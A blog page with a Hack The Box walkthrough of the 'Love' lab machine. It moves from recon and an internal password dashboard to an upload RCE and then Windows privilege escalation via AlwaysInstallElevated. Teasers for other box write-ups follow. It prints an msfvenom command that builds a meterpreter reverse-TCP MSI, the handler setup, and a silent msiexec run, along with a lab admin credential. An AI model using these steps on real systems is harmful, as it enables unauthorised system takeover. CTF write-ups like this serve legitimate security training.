Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Post a Comment

Love HTB Walkthrough

-

 

 


Hey guys Styx here. Back again with another HTB walkthrough.
This time we go through the Love box which is rated as easy.

## RECON ##

 
as usual add love.htb to the /etc/hosts file.

Let's kick off off a quick rust scan. 

We quickly see that there are 19 ports open. Let's look at further results.

Looking at the scan results we see staging.love.htb. Let's add this to our host file.


Ok let's move on to content discovery. 

When enumerating the target we see that we got a hit on /admin let's browse to this location. 

In this pic  here we can see that we found an admin panel. No further results were found that we can use to dig deeper in the application. So let's look back at the nmap results. Let's take a look at staging.love.htb. And on staging.love.htb we found the file scanner. Let's see if we can scan some of the local ports using this file scanner.

after trying a few ports that also used HTTP (as shown in the nmap results). Eventually,by scanning 127.0.0.1:5000 we found the password panel! It seems like we found a password dashboard. 


admin creds

Vote Admin Creds admin: @LoveIsInTheAir!!!!
this provides us access to the admin panel over at http://love.htb/admin


## Exploitation ##


Now that we have access to this panel it's time to look for a way to get an initial foothold on the server.

As you can see in the next pic. There is an RCE in the upload functionality when registering new candidates and uploading a photo. This function is located at /admin/candidates.php




There are a few ways to exploit this vulnerability but I chose the lazy way this time.
Check out this script  HERE

Change some of the path parameters and you are good to go.


And we are in!

On Phoebe's Desktop directory you will find the user.txt


## Privilege Escalation ##

Now let's move on to get system on this box.

When enumerating the system. We see that the AllwaysInstallElevated policy is enabled. This can be verified by running:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If these 2 registers are enabled (value = 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

In the next pic you see that this is the case!


So let's move on creating that .msi file!


In order to create:
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f msi -o styx.msi

Then follow these steps:

  1. Transfer the .msi file to the target.
  2. Use msfconsoles' handler to receive the reverse shell. ("use exploit/multi/handler" and set the payload to "windows/meterpreter/reverse_tcp"
  3. On the target machine run the file with msiexec /quiet /qn /i styx.msi

voila! we are system.


I hope you enjoyed this walkthrough and you learned something new. 
See you in the next one.

Cheers!

Styx

Comments

Post a Comment

Popular posts from this blog

Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Read more

Schooled HTB -Writeup

-
Image
Hey guys Styx here, In this write-up I'll walk you through the steps in order to root the Schooled box. This box is rated medium and is in my opinion,a realistic scenario. Hopefully this write-up can be of educational value to you. Let's get into it! # Start Enum # Like every pen-test we start off with some reconnaissance. We scan for open ports and services that are exposed by the target machine. In the picture you can see the Nmap results.    nmap output In the Nmap results we see that our target has 2 ports open. The first thing I tried was to check for content on port 80. but our content discovery on the initial port led nowhere. so lets' enumerate possible subdomains.     ## SUBDOMAIN ENUM ## ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750 A very useful and quick tool to perform this enumeration is the tool FFUF. Check it out on github. As you can see on the pic above w...
Read more

Seal HTB Walkthrough

-
Image
Hey dudes and dudettes. In this post we'll be walking through the Seal Box. This box is rated as medium.  ## RECON ## Let's start with a quick nmap and see what ports and services are open.  ____________________________________________________________________________________ PORT     STATE SERVICE    REASON  VERSION 22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1FohcrXkoPYUOtmzAh5PlCU2H0+sFcGl6XXS6vX2lLJ3RD2Vd+KlcYtc2wQLjcYJhkFe793jmkogOSh0uI+fKQA9z1Ib3J0vtsIaNkXxvSMPcr54QxXgg1guaM1OQl43ePUADXnB6WqAg8QyF6Nxoa18vboOAu3a8Wn9Qf9iCpoU93d5zQj+FsBKVaDs3zuJkUBRfjsqq7rEMpxqCfkFIeUrJF9MBsQhgsEVUbo1zicWG32m49PgDbKr9yE3lPsV9K4b9ugNQ3zwWW5a1OpOs+r3AxFcu2q65N2znV3/p41ul9+fWXo9pm0jJPJ3V5gZphDkXVZEw16K2hcgQcQJUH7luaVTRpzqDxXaiK/8wChtMXEUjFQKL6sn...
Read more